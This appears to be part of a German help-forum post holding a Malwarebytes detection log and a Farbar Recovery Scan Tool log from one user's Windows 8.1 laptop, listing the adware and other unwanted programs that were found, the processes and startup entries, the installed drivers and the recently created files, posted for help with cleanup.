PUP.Optional.InterStat, C:\Windows\SysWOW64\config\systemprofile\AppData\Local\CrashRpt\UnsentCrashReports\Interstatnogui_389\Logs, L鰏chen bei Neustart, [1407], [373566],1.0.2089
PUP.Optional.InterStat, C:\WINDOWS\SYSWOW64\CONFIG\SYSTEMPROFILE\APPDATA\LOCAL\CRASHRPT\UNSENTCRASHREPORTS\Interstatnogui_389, L鰏chen bei Neustart, [1407], [373566],1.0.2089
PUP.Optional.Geniv, C:\WINDOWS\SYSWOW64\CONFIG\SYSTEMPROFILE\APPDATA\LOCAL\PROGRAMS\GEN, L鰏chen bei Neustart, [2006], [386985],1.0.2089
PUP.Optional.NetSurvey, C:\USERS\NICK SCHUSTER\APPDATA\ROAMING\NETCTL, L鰏chen bei Neustart, [1070], [325153],1.0.2089

Datei: 35
Backdoor.BetaBot.MSIL, C:\ProgramData\Google Updater 2.0\weyum79gyki7u.exe, L鰏chen bei Neustart, [4794], [378613],1.0.2089
PUP.Optional.SwytShop, C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Programs\SwytShopAlgoadChrome_Pkg3a\captcha.hta, L鰏chen bei Neustart, [3131], [386986],1.0.2089
PUP.Optional.SwytShop, C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Programs\SwytShopAlgoadChrome_Pkg3a\unins000.dat, L鰏chen bei Neustart, [3131], [386986],1.0.2089
PUP.Optional.SwytShop, C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Programs\SwytShopAlgoadChrome_Pkg3a\unins000.exe, L鰏chen bei Neustart, [3131], [386986],1.0.2089
PUP.Optional.FastSearch, C:\Users\Nick Schuster\AppData\Roaming\Mozilla\Firefox\Profiles\5f8d7llm.default\extensions\amcontextmenu@loucypher\0024397e, L鰏chen bei Neustart, [1144], [329326],1.0.2089
Adware.Elex, C:\USERS\NICK SCHUSTER\APPDATA\ROAMING\PROFILES\ATETIS.DEFAULT\SEARCHPLUGINS\0U8HA2GG.XML, L鰏chen bei Neustart, [2], [387118],1.0.2089
PUP.Optional.StartPage.ShrtCln, C:\USERS\NICK SCHUSTER\APPDATA\ROAMING\MOZILLA\FIREFOX\PROFILES\5F8D7LLM.DEFAULT\PREFS.JS, Ersetzt, [1907], [373827],1.0.2089
Adware.Elex, C:\USERS\NICK SCHUSTER\APPDATA\ROAMING\MOZILLA\FIREFOX\PROFILES\5F8D7LLM.DEFAULT\PREFS.JS, Ersetzt, [2], [386249],1.0.2089
PUP.Optional.SpeedingUpMyPC, C:\USERS\NICK SCHUSTER\APPDATA\ROAMING\NETCTL\NETCTL.EXE, L鰏chen bei Neustart, [906], [389100],1.0.2089
PUP.Optional.LuckySearch123, C:\USERS\NICK SCHUSTER\APPDATA\ROAMING\MOZILLA\FIREFOX\PROFILES\5F8D7LLM.DEFAULT\USER.JS, L鰏chen bei Neustart, [2767], [360048],1.0.2089
Adware.Elex, C:\USERS\NICK SCHUSTER\APPDATA\ROAMING\PROFILES\ATETIS.DEFAULT\PREFS.JS, Ersetzt, [2], [387123],1.0.2089
Adware.Elex, C:\USERS\NICK SCHUSTER\APPDATA\ROAMING\PROFILES\ATETIS.DEFAULT\PREFS.JS, Ersetzt, [2], [387123],1.0.2089
Adware.Elex, C:\USERS\NICK SCHUSTER\APPDATA\ROAMING\PROFILES\ATETIS.DEFAULT\PREFS.JS, Ersetzt, [2], [387123],1.0.2089
Adware.Elex, C:\USERS\NICK SCHUSTER\APPDATA\ROAMING\PROFILES\ATETIS.DEFAULT\PREFS.JS, Ersetzt, [2], [387123],1.0.2089
Adware.Elex, C:\USERS\NICK SCHUSTER\APPDATA\ROAMING\PROFILES\ATETIS.DEFAULT\PREFS.JS, Ersetzt, [2], [387123],1.0.2089
Adware.Elex, C:\USERS\NICK SCHUSTER\APPDATA\ROAMING\PROFILES\ATETIS.DEFAULT\PREFS.JS, Ersetzt, [2], [387123],1.0.2089
Adware.Elex, C:\USERS\NICK SCHUSTER\APPDATA\ROAMING\PROFILES\ATETIS.DEFAULT\PREFS.JS, Ersetzt, [2], [387123],1.0.2089
Adware.Amonetize, C:\WINDOWS\SYSTEM32\CONFIG\SYSTEMPROFILE\APPDATA\ROAMING\THEOBALD.DLL, L鰏chen bei Neustart, [1090], [394470],1.0.2089
PUP.Optional.Geniv, C:\WINDOWS\SYSWOW64\CONFIG\SYSTEMPROFILE\APPDATA\LOCAL\PROGRAMS\GEN\URL.TXT, L鰏chen bei Neustart, [2006], [386985],1.0.2089
PUP.Optional.Geniv, C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Programs\GEN\custom1.txt, L鰏chen bei Neustart, [2006], [386985],1.0.2089
PUP.Optional.Geniv, C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Programs\GEN\GEN.exe, L鰏chen bei Neustart, [2006], [386985],1.0.2089
PUP.Optional.Geniv, C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Programs\GEN\version.txt, L鰏chen bei Neustart, [2006], [386985],1.0.2089
PUP.Optional.eShopComp, C:\WINDOWS\SYSTEM32\CONFIG\SYSTEMPROFILE\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\LOCAL STORAGE\https_pstatic.eshopcomp.com_0.localstorage, L鰏chen bei Neustart, [15584], [255829],1.0.2089
PUP.Optional.eShopComp, C:\WINDOWS\SYSTEM32\CONFIG\SYSTEMPROFILE\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\LOCAL STORAGE\https_pstatic.eshopcomp.com_0.localstorage-journal, L鰏chen bei Neustart, [15584], [255829],1.0.2089
PUP.Optional.eShopComp, C:\USERS\NICK SCHUSTER\APPDATA\LOCAL\CHROMIUM\USER DATA\DEFAULT\LOCAL STORAGE\https_pstatic.eshopcomp.com_0.localstorage, L鰏chen bei Neustart, [15584], [256007],1.0.2089
PUP.Optional.eShopComp, C:\USERS\NICK SCHUSTER\APPDATA\LOCAL\CHROMIUM\USER DATA\DEFAULT\LOCAL STORAGE\https_pstatic.eshopcomp.com_0.localstorage-journal, L鰏chen bei Neustart, [15584], [256007],1.0.2089
PUP.Optional.CrossRider, C:\USERS\NICK SCHUSTER\APPDATA\LOCAL\CHROMIUM\USER DATA\DEFAULT\LOCAL STORAGE\https_d19tqk5t6qcjac.cloudfront.net_0.localstorage, L鰏chen bei Neustart, [240], [256626],1.0.2089
PUP.Optional.CrossRider, C:\USERS\NICK SCHUSTER\APPDATA\LOCAL\CHROMIUM\USER DATA\DEFAULT\LOCAL STORAGE\https_d19tqk5t6qcjac.cloudfront.net_0.localstorage-journal, L鰏chen bei Neustart, [240], [256626],1.0.2089
PUP.Optional.StartPage.ShrtCln, C:\USERS\NICK SCHUSTER\APPDATA\ROAMING\MOZILLA\FIREFOX\PROFILES\5F8D7LLM.DEFAULT\SEARCHPLUGINS\startpageing123.xml, L鰏chen bei Neustart, [1907], [373841],1.0.2089
PUP.Optional.MindSpark, C:\WINDOWS\SYSTEM32\CONFIG\SYSTEMPROFILE\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\LOCAL STORAGE\http_inboxace.dl.myway.com_0.localstorage, L鰏chen bei Neustart, [274], [240305],1.0.2089
PUP.Optional.MindSpark, C:\WINDOWS\SYSTEM32\CONFIG\SYSTEMPROFILE\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\LOCAL STORAGE\http_inboxace.dl.myway.com_0.localstorage-journal, L鰏chen bei Neustart, [274], [240305],1.0.2089
PUP.Optional.MindSpark, C:\WINDOWS\SYSTEM32\CONFIG\SYSTEMPROFILE\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\LOCAL STORAGE\http_inboxace.dl.tb.ask.com_0.localstorage, L鰏chen bei Neustart, [274], [240306],1.0.2089
PUP.Optional.MindSpark, C:\WINDOWS\SYSTEM32\CONFIG\SYSTEMPROFILE\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\LOCAL STORAGE\http_inboxace.dl.tb.ask.com_0.localstorage-journal, L鰏chen bei Neustart, [274], [240306],1.0.2089
PUP.Optional.MyLucky123.ShrtCln, C:\USERS\NICK SCHUSTER\APPDATA\ROAMING\MOZILLA\FIREFOX\PROFILES\5F8D7LLM.DEFAULT\SEARCHPLUGINS\LUCK.XML, L鰏chen bei Neustart, [1190], [346224],1.0.2089
PUP.Optional.Trotux, C:\USERS\NICK SCHUSTER\APPDATA\ROAMING\MOZILLA\FIREFOX\PROFILES\5F8D7LLM.DEFAULT\SEARCHPLUGINS\6DDY6FJK.XML, L鰏chen bei Neustart, [338], [302745],1.0.2089

Physischer Sektor: 0
(keine b鰏artigen Elemente erkannt)


(end)
         

FRST Logfile:
Code:
ATTFilter
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 02-06-2017
durchgef黨rt von Nick Schuster (Administrator) auf RAZERLAP (05-06-2017 17:01:51)
Gestartet von C:\Users\Nick Schuster\Desktop\killer.exe
Geladene Profile: Nick Schuster (Verf黦bare Profile: Nick Schuster)
Platform: Windows 8.1 (Update) (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: IE)
Start-Modus: Normal
Anleitung f黵 Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
() C:\Program Files (x86)\Canon\IJPLM\ijplmsvc.exe
(DEVGURU Co., LTD.) C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
() C:\Windows\System32\igfxTray.exe
(Microsoft Corporation) C:\Windows\System32\SkyDrive.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe

==================== Registry (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zur點kgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [AirServer64] => C:\Program Files\App Dynamic\AirServer\AirServer.exe
HKLM\...\Run: [AdobeAAMUpdater-1.0] => "C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe"
HKLM\...\Run: [Malwarebytes TrayApp] => C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbamtray.exe [3146704 2017-05-09] (Malwarebytes)
HKLM-x32\...\Run: [BlueStacks Agent] => C:\Program Files (x86)\BlueStacks\HD-Agent.exe
HKLM-x32\...\Run: [Dropbox] => "C:\Program Files (x86)\Dropbox\Client\Dropbox.exe" /systemstartup
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [587288 2016-12-12] (Oracle Corporation)
HKLM-x32\...\Run: [IJNetworkScannerSelectorEX] => C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe [235624 2015-01-09] (CANON INC.)
HKLM-x32\...\Run: [CanonQuickMenu] => C:\Program Files (x86)\Canon\Quick Menu\CNQMMAIN.EXE [1314432 2016-06-09] (CANON INC.)
HKLM\ DisallowedCertificates: FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 (Doctor Web Ltd.) <==== ACHTUNG
Startup: C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MEGAsync.lnk [2017-06-05]

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zur點kgesetzt, wenn es sich um einen Registryeintrag handelt.)

Tcpip\Parameters: [DhcpNameServer] 192.168.192.1
Tcpip\..\Interfaces\{04A2521B-7C11-484A-B28D-E9BE3102A821}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{8718928D-CBEB-45EA-A621-800A9249001D}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{8EA2322E-EF2C-4423-AF3C-3EE361FD417B}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{8EA2322E-EF2C-4423-AF3C-3EE361FD417B}: [DhcpNameServer] 8.8.8.8
Tcpip\..\Interfaces\{9BAF9E4B-D963-4721-8C85-586F3F37FF3C}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{9BAF9E4B-D963-4721-8C85-586F3F37FF3C}: [DhcpNameServer] 192.168.192.1
Tcpip\..\Interfaces\{bbed3e08-0b41-11e3-8249-806e6f6e6963}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{C085ED3F-9016-49ED-8EF6-3F93AD892C71}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{D14F6D89-FA6F-4917-80C9-3F09BF6A6D5D}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{E0DF352E-2385-4F61-8BE1-15E2F9F0520E}: [NameServer] 8.8.8.8
ManualProxies: 

Internet Explorer:
==================
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.de/?hl=de&gl=de
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
BHO: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files\Canon\Easy-WebPrint EX\ewpexbho.dll [2016-02-23] (CANON INC.)
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_121\bin\ssv.dll [2017-02-13] (Oracle Corporation)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_121\bin\jp2ssv.dll [2017-02-13] (Oracle Corporation)
BHO-x32: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexbho.dll [2016-02-23] (CANON INC.)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_121\bin\ssv.dll [2017-02-13] (Oracle Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_121\bin\jp2ssv.dll [2017-02-13] (Oracle Corporation)
Toolbar: HKLM - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files\Canon\Easy-WebPrint EX\ewpexhlp.dll [2016-02-23] (CANON INC.)
Toolbar: HKLM-x32 - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll [2016-02-23] (CANON INC.)
DPF: HKLM-x32 {166B1BCA-3F9C-11CF-8075-444553540000} hxxps://fpdownload.macromedia.com/pub/shockwave/cabs/director/sw.cab
DPF: HKLM-x32 {233C1507-6A77-46A4-9443-F871F945D258} hxxps://fpdownload.macromedia.com/pub/shockwave/cabs/director/sw.cab

FireFox:
========
FF DefaultProfile: ajsmomju.default
FF ProfilePath: C:\Users\Nick Schuster\AppData\Roaming\Mozilla\Firefox\Profiles\ajsmomju.default [2017-06-05]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_25_0_0_171.dll [2017-05-09] ()
FF Plugin: @java.com/DTPlugin,version=11.121.2 -> C:\Program Files\Java\jre1.8.0_121\bin\dtplugin\npDeployJava1.dll [2017-02-13] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.121.2 -> C:\Program Files\Java\jre1.8.0_121\bin\plugin2\npjp2.dll [2017-02-13] (Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50906.0\npctrl.dll [2017-03-09] ( Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=2.2.4 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [Keine Datei]
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_25_0_0_171.dll [2017-05-09] ()
FF Plugin-x32: @java.com/DTPlugin,version=11.121.2 -> C:\Program Files (x86)\Java\jre1.8.0_121\bin\dtplugin\npDeployJava1.dll [2017-02-13] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.121.2 -> C:\Program Files (x86)\Java\jre1.8.0_121\bin\plugin2\npjp2.dll [2017-02-13] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50906.0\npctrl.dll [2017-03-09] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-28] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-28] (Google Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll [Keine Datei]
FF Plugin HKU\S-1-5-21-3847841184-804715454-2304624315-1001: ubisoft.com/uplaypc -> C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\npuplaypc.dll [Keine Datei]

Chrome: 
=======
CHR Profile: C:\Users\Nick Schuster\AppData\Local\Google\Chrome\User Data\Backup-Standard [2017-06-05] <==== ACHTUNG
CHR Extension: (Docs) - C:\Users\Nick Schuster\AppData\Local\Google\Chrome\User Data\Backup-Standard\Extensions\aohghmighlieiainnegkcijnfilokake [2017-05-30]
CHR Extension: (Google Drive) - C:\Users\Nick Schuster\AppData\Local\Google\Chrome\User Data\Backup-Standard\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-05-30]
CHR Extension: (YouTube) - C:\Users\Nick Schuster\AppData\Local\Google\Chrome\User Data\Backup-Standard\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-05-30]
CHR Extension: (Google Mail) - C:\Users\Nick Schuster\AppData\Local\Google\Chrome\User Data\Backup-Standard\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-05-30]

==================== Dienste (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2246256 2017-05-18] (Adobe Systems, Incorporated)
S4 DbxSvc; C:\Windows\system32\DbxSvc.exe [42096 2016-12-21] (Dropbox, Inc.)
R2 igfxCUIService2.0.0.0; C:\Windows\system32\igfxCUIService.exe [365048 2016-10-07] (Intel Corporation)
R2 IJPLMSVC; C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE [387144 2016-02-04] ()
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [4470736 2017-05-09] (Malwarebytes)
R2 ss_conn_service; C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe [754784 2016-07-22] (DEVGURU Co., LTD.)
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [10888944 2017-04-25] (TeamViewer GmbH)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [361824 2017-01-12] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [119872 2017-01-12] (Microsoft Corporation)
S4 KingoSoftService; C:\Users\Nick Schuster\AppData\Local\Kingosoft\Kingo Root\update_27205\bin\KingoSoftService.exe "C:\Users\Nick Schuster\AppData\Local\Kingosoft\Kingo Root\update_27205\bin\checkupdate.exe"

===================== Treiber (Nicht auf der Ausnahmeliste) ======================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

S3 DFX11_1; C:\Windows\system32\drivers\dfx11_1x64.sys [28008 2015-08-31] (Windows (R) Win 7 DDK provider)
S3 DFX12; C:\Windows\system32\drivers\dfx12x64.sys [29688 2015-11-12] (Windows (R) Win 7 DDK provider)
S3 dg_ssudbus; C:\Windows\system32\DRIVERS\ssudbus.sys [131984 2017-05-18] (Samsung Electronics Co., Ltd.)
S3 dtlitescsibus; C:\Windows\System32\drivers\dtlitescsibus.sys [30264 2017-05-07] (Disc Soft Ltd)
S3 dtliteusbbus; C:\Windows\System32\drivers\dtliteusbbus.sys [47672 2017-05-07] (Disc Soft Ltd)
S3 dtproscsibus; C:\Windows\System32\drivers\dtproscsibus.sys [30264 2017-05-25] (Disc Soft Ltd)
R1 ESProtectionDriver; C:\Windows\system32\drivers\mbae64.sys [77376 2017-05-31] ()
R3 iaLPSS_GPIO; C:\Windows\System32\drivers\iaLPSS_GPIO.sys [35832 2014-06-03] (Intel Corporation)
R2 MBAMChameleon; C:\Windows\system32\drivers\MBAMChameleon.sys [188312 2017-06-05] (Malwarebytes)
R3 MBAMFarflt; C:\Windows\system32\drivers\farflt.sys [113592 2017-06-05] (Malwarebytes)
R3 MBAMProtection; C:\Windows\system32\drivers\mbam.sys [44960 2017-06-05] (Malwarebytes)
R0 MBAMSwissArmy; C:\Windows\System32\drivers\MBAMSwissArmy.sys [252832 2017-06-05] (Malwarebytes)
R3 MBAMWebProtection; C:\Windows\system32\drivers\mwac.sys [93600 2017-06-05] (Malwarebytes)
R3 NETwNb64; C:\Windows\system32\DRIVERS\NETwbw02.sys [3526400 2017-03-09] (Intel Corporation)
S3 RTSUER; C:\Windows\system32\Drivers\RtsUer.sys [425216 2016-05-25] (Realsil Semiconductor Corporation)
R0 sptd; C:\Windows\System32\Drivers\sptd.sys [394296 2017-05-07] (Duplex Secure Ltd.)
S3 ssudmdm; C:\Windows\system32\DRIVERS\ssudmdm.sys [166288 2017-05-18] (Samsung Electronics Co., Ltd.)
S3 USBAAPL64; C:\Windows\System32\Drivers\usbaapl64.sys [51712 2011-02-18] (Apple, Inc.) [Datei ist nicht signiert]
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [46600 2017-02-10] (Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [274776 2017-01-12] (Microsoft Corporation)
R2 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [117592 2017-01-12] (Microsoft Corporation)
S3 dbx; system32\DRIVERS\dbx.sys [X]

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-06-05 17:00 - 2017-06-05 17:00 - 00013976 _____ C:\Users\Nick Schuster\Desktop\mbam.txt
2017-06-05 15:57 - 2017-06-05 16:58 - 00252832 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2017-06-05 15:57 - 2017-06-05 16:58 - 00113592 _____ (Malwarebytes) C:\Windows\system32\Drivers\farflt.sys
2017-06-05 15:57 - 2017-06-05 16:58 - 00093600 _____ (Malwarebytes) C:\Windows\system32\Drivers\mwac.sys
2017-06-05 15:57 - 2017-06-05 16:58 - 00044960 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2017-06-05 15:57 - 2017-06-05 15:57 - 00188312 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMChameleon.sys
2017-06-05 15:57 - 2017-06-05 15:57 - 00001891 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2017-06-05 15:57 - 2017-06-05 15:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2017-06-05 15:57 - 2017-06-05 15:57 - 00000000 ____D C:\Program Files\Malwarebytes
2017-06-05 15:57 - 2017-05-31 11:09 - 00077376 _____ C:\Windows\system32\Drivers\mbae64.sys
2017-06-05 15:54 - 2017-06-05 15:54 - 00034459 _____ C:\Users\Nick Schuster\Desktop\AdwCleaner[C0].txt
2017-06-05 15:48 - 2017-06-05 15:51 - 00000000 ____D C:\AdwCleaner
2017-06-05 15:46 - 2017-06-05 15:46 - 04110280 _____ C:\Users\Nick Schuster\Desktop\adwcleaner_6.047.exe
2017-06-05 15:43 - 2017-06-05 15:37 - 00109339 _____ C:\Users\Nick Schuster\Desktop\Fixlog.txt
2017-06-05 15:40 - 2017-06-05 15:40 - 00000008 __RSH C:\ProgramData\ntuser.pol
2017-06-05 15:30 - 2017-06-05 17:01 - 00000000 ____D C:\Users\Nick Schuster\Desktop\killer.exe
2017-06-03 18:29 - 2017-06-03 18:29 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\Wargaming.net
2017-06-03 17:56 - 2017-06-03 19:08 - 00000000 ____D C:\Games
2017-06-03 14:01 - 2017-06-05 17:01 - 00000000 ____D C:\FRST
2017-05-30 19:32 - 2017-05-30 19:32 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\Google
2017-05-30 19:23 - 2017-05-31 13:53 - 00002020 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2017-05-30 19:23 - 2017-05-30 19:23 - 00000000 ____D C:\Program Files\Mozilla Firefox
2017-05-26 18:05 - 2017-05-26 18:05 - 00000000 ____D C:\ProgramData\Electronic Arts
2017-05-26 17:40 - 2017-05-26 17:40 - 00000295 _____ C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Papierkorb.lnk
2017-05-25 15:34 - 2017-05-25 15:36 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\DAEMON Tools Pro
2017-05-25 15:34 - 2017-05-25 15:34 - 00030264 _____ (Disc Soft Ltd) C:\Windows\system32\Drivers\dtproscsibus.sys
2017-05-25 15:33 - 2017-05-25 15:33 - 00000000 ____D C:\ProgramData\DAEMON Tools Pro
2017-05-23 15:44 - 2017-04-27 15:11 - 00678592 _____ (Microsoft Corporation) C:\Windows\system32\msvcp120_clr0400.dll
2017-05-23 15:44 - 2017-04-27 15:10 - 00536768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msvcp120_clr0400.dll
2017-05-23 15:43 - 2017-04-27 15:11 - 00869568 _____ (Microsoft Corporation) C:\Windows\system32\msvcr120_clr0400.dll
2017-05-23 15:43 - 2017-04-27 15:10 - 00875712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msvcr120_clr0400.dll
2017-05-23 15:42 - 2017-04-06 19:37 - 00445440 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll
2017-05-23 15:42 - 2017-04-06 19:16 - 00615936 _____ (Microsoft Corporation) C:\Windows\system32\wpd_ci.dll
2017-05-23 15:42 - 2017-04-06 18:50 - 01436672 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2017-05-23 15:42 - 2017-04-06 18:46 - 00434688 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2017-05-23 15:42 - 2017-04-06 18:46 - 00324096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll
2017-05-23 15:42 - 2017-04-06 18:35 - 01362432 _____ (Microsoft Corporation) C:\Windows\system32\gpsvc.dll
2017-05-23 15:42 - 2017-04-06 18:15 - 00358912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2017-05-23 15:42 - 2017-04-06 17:44 - 00087040 _____ (Microsoft Corporation) C:\Windows\system32\wpdbusenum.dll
2017-05-23 15:42 - 2017-04-02 16:49 - 00186880 _____ (Microsoft Corporation) C:\Windows\system32\dpapisrv.dll
2017-05-23 15:42 - 2017-04-02 15:40 - 02013016 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ntfs.sys
2017-05-22 21:24 - 2017-05-22 21:24 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2017-05-18 22:17 - 2017-05-18 22:17 - 01499368 _____ (Microsoft Corporation) C:\Windows\system32\WdfCoInstaller01007.dll
2017-05-18 22:17 - 2017-05-18 22:17 - 00716880 _____ (Microsoft Corporation) C:\Windows\system32\WinUSBCoInstaller.dll
